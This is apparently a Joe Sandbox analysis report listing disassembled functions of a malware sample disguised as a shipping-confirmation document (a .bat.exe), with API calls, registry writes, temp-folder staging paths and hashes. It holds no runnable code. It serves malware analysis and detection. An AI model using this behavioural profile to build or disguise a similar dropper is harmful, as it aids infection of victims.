Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp$C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt$Call
API String ID: 1941528284-842788378
Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
wsprintfW.USER32 ref: 00406A58
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C

Strings

%s%S.dll, xrefs: 00406A52
UXTHEME, xrefs: 00406A0F

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

Function 733B1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 733B1BFF: GlobalFree.KERNEL32(?), ref: 733B1E74
Part of subcall function 733B1BFF: GlobalFree.KERNEL32(?), ref: 733B1E79
Part of subcall function 733B1BFF: GlobalFree.KERNEL32(?), ref: 733B1E7E

GlobalFree.KERNEL32(00000000), ref: 733B18C5
FreeLibrary.KERNEL32(?), ref: 733B194B
GlobalFree.KERNEL32(00000000), ref: 733B1970

Part of subcall function 733B243E: GlobalAlloc.KERNEL32(00000040,?), ref: 733B246F

Part of subcall function 733B2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,733B1896,00000000), ref: 733B28E0

Part of subcall function 733B1666: wsprintfW.USER32 ref: 733B1694

Strings

, xrefs: 733B1951

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: e798f0f8bdade1856ab723bb090272bd60e5dc2c88e5a6cf1674be0e48db0d7c
Instruction ID: d7355f2e343b16fa8a4b6dded15b8b33cd4650a67fe7f8cf9d8d132d2fa06ef9
Opcode Fuzzy Hash: e798f0f8bdade1856ab723bb090272bd60e5dc2c88e5a6cf1674be0e48db0d7c
Instruction Fuzzy Hash: C241BF72D003899BEB319F20DC84F8537BEBF05351F184569E94BDA8CADBBC818587A0

Function 0040347E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403492

Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
SetFilePointer.KERNELBASE(00129FEB,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0

Strings

O, xrefs: 004034DC

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: O
API String ID: 1092082344-3926687730
Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
API String ID: 2655323295-247911329
Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004061BF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004061A6
nsa, xrefs: 004061AE

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\eftermodnendes\ringeagt, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\eftermodnendes\ringeagt
API String ID: 1892508949-1820855999
Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E

Function 004071D5 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45

Function 004073D6 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45

Function 004070EC Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
